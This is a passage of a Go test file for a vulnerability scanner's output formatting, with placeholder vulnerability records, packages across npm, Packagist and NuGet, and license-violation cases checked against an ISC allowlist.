[]models.GroupInfo{ {IDs: []string{"OSV-1"}}, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.2", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{ {IDs: []string{"OSV-3"}}, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-3", Summary: "Something mildly scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_grouped_packages,_and_multiple_vulnerabilities", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: 
models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"dev", "optional"}, Groups: []models.GroupInfo{ {IDs: []string{"OSV-1"}}, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.2", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"dev"}, Groups: []models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"build"}, Groups: []models.GroupInfo{ {IDs: []string{"OSV-3"}}, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-3", Summary: "Something mildly scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: 
[]*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "author1/mine1", Version: "1.2.3", Ecosystem: "Packagist", Extractor: composerlock.Extractor{}, }), Groups: []models.GroupInfo{ {IDs: []string{"OSV-1"}}, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.2", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "NuGet", Extractor: dotnetpe.Extractor{}, }), DepGroups: []string{"dev"}, Groups: []models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "author3/mine3", Version: "0.4.1", Ecosystem: "Packagist", Extractor: packagelockjson.Extractor{}, }), DepGroups: 
[]string{"build"}, Groups: []models.GroupInfo{ {IDs: []string{"OSV-3"}, MaxSeverity: "4.3"}, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-3", Summary: "Something mildly scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "author1/mine1", Version: "1.2.3", Ecosystem: "Packagist", Commit: "123abc", Extractor: composerlock.Extractor{}, }), Groups: []models.GroupInfo{ {IDs: []string{"OSV-1"}}, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Ecosystem: "npm", Commit: "abcxyz", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "NuGet", Extractor: dotnetpe.Extractor{}, }), DepGroups: []string{"dev"}, Groups: 
[]models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "author3/mine3", Version: "0.4.1", Ecosystem: "Packagist", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"build"}, Groups: []models.GroupInfo{ {IDs: []string{"OSV-3"}}, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-3", Summary: "Something mildly scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "author1/mine1", Version: "1.2.3", Ecosystem: "Packagist", Extractor: composerlock.Extractor{}, }), Groups: []models.GroupInfo{ { IDs: []string{"OSV-1"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-1": {Called: false}, }, }, { IDs: []string{"OSV-5"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-5": {Called: true}, }, }, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.2", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: 
[]string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-1", Summary: "Something scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "NuGet", Extractor: dotnetpe.Extractor{}, }), DepGroups: []string{"dev"}, Groups: []models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-2", Summary: "Something less scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "author3/mine3", Version: "0.4.1", Ecosystem: "Packagist", Extractor: composerlock.Extractor{}, }), DepGroups: []string{"build"}, Groups: []models.GroupInfo{ { IDs: []string{"OSV-3"}, ExperimentalAnalysis: map[string]models.AnalysisInfo{ "OSV-3": {Called: true}, }, }, {IDs: []string{"OSV-5"}}, }, Vulnerabilities: []*osvschema.Vulnerability{ { Id: "OSV-3", Summary: "Something mildly scary!", Severity: []*osvschema.Severity{{Score: "1"}}, }, { Id: "OSV-5", Summary: "Something scarier!", Severity: []*osvschema.Severity{{Score: "1"}}, }, }, }, }, }, }, }, }, }, { name: "one_source_with_vulnerabilities,_some_missing_content", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-1"}}}, Vulnerabilities: []*osvschema.Vulnerability{ {Id: "OSV-1", Details: "This vulnerability allows for some very scary stuff to happen - 
seriously, you'd not believe it!"}, }, }, { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine3", Version: "0.10.2-rc", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Groups: []models.GroupInfo{{IDs: []string{"OSV-2"}}}, Vulnerabilities: []*osvschema.Vulnerability{ {Id: "OSV-2"}, }, }, }, }, }, }, }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() run(t, tt.args) }) } } func testOutputWithLicenseViolations(t *testing.T, run outputTestRunner) { t.Helper() cwd := filepath.ToSlash(testutility.GetCurrentWorkingDirectory(t)) experimentalAnalysisConfig := models.ExperimentalAnalysisConfig{ Licenses: models.ExperimentalLicenseConfig{Summary: false, Allowlist: []models.License{"ISC"}}, } tests := []outputTestCase{ { name: "no_sources", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{}, }, }, }, { name: "one_source_with_no_packages", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{}, }, }, }, }, }, { name: "multiple_sources_with_no_packages", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{}, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{}, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{}, }, }, }, }, }, { name: 
"one_source_with_one_package,_no_licenses", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{}, LicenseViolations: []models.License{}, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_an_unknown_license", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"UNKNOWN"}, LicenseViolations: []models.License{}, }, }, }, }, }, }, }, { name: "one_source_with_one_package,_no_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages,_no_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ 
ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd 
+ "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "one_source_with_one_package_with_both_a_version_and_a_commit_and_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Commit: "abc123", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "one_source_with_one_package_with_just_a_commit_and_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Ecosystem: "npm", Commit: "abc123", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_one_license_violation_(dev)", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", 
Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"dev"}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "two_sources_with_packages,_one_license_violation", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "5.9.0", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages,_some_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, 
}, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"Apache-2.0"}, LicenseViolations: []models.License{"Apache-2.0"}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages_and_groups,_some_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"dev", "optional"}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, { Source: 
models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"dev", "optional"}, Licenses: []models.License{"Apache-2.0"}, LicenseViolations: []models.License{"Apache-2.0"}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), DepGroups: []string{"build"}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_some_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "author1/mine1", Version: "1.2.3", Ecosystem: "Packagist", Extractor: composerlock.Extractor{}, }), Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, 
}, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"Apache-2.0"}, LicenseViolations: []models.License{"Apache-2.0"}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "mine1", Version: "1.3.5", Ecosystem: "NuGet", Extractor: packageslockjson.Extractor{}, }), Licenses: []models.License{"ISC"}, LicenseViolations: []models.License{}, }, { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: "author1/mine1", Version: "1.2.3", Ecosystem: "Packagist", Extractor: composerlock.Extractor{}, }), DepGroups: []string{"dev"}, Licenses: []models.License{"MIT"}, LicenseViolations: []models.License{"MIT"}, }, }, }, }, }, }, }, { name: "one_source_with_one_package_and_multiple_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ ExperimentalAnalysisConfig: experimentalAnalysisConfig, Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT", "Apache-2.0"}, LicenseViolations: []models.License{"MIT", "Apache-2.0"}, }, }, }, }, }, }, }, { 
name: "multiple_sources_with_a_mixed_count_of_packages,_some_license_violations", args: outputTestCaseArgs{ vulnResult: &models.VulnerabilityResults{ Results: []models.PackageSource{ { Source: models.SourceInfo{Path: cwd + "/path/to/my/first/lockfile", Type: models.SourceTypeProjectPackage}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/first/lockfile", pkginfo{ Name: "mine1", Version: "1.2.3", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"MIT", "Apache-2.0"}, LicenseViolations: []models.License{"MIT"}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/second/lockfile", Type: models.SourceTypeSBOM}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine2", Version: "3.2.5", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"UNKNOWN"}, LicenseViolations: []models.License{"UNKNOWN"}, }, { Package: newPackageInfo(cwd+"/path/to/my/second/lockfile", pkginfo{ Name: "mine3", Version: "0.4.1", Ecosystem: "npm", Extractor: packagelockjson.Extractor{}, }), Licenses: []models.License{"Apache-2.0"}, LicenseViolations: []models.License{}, }, }, }, { Source: models.SourceInfo{Path: cwd + "/path/to/my/third/lockfile", Type: models.SourceTypeUnknown}, Packages: []models.PackageVulns{ { Package: newPackageInfo(cwd+"/path/to/my/third/lockfile", pkginfo{ Name: 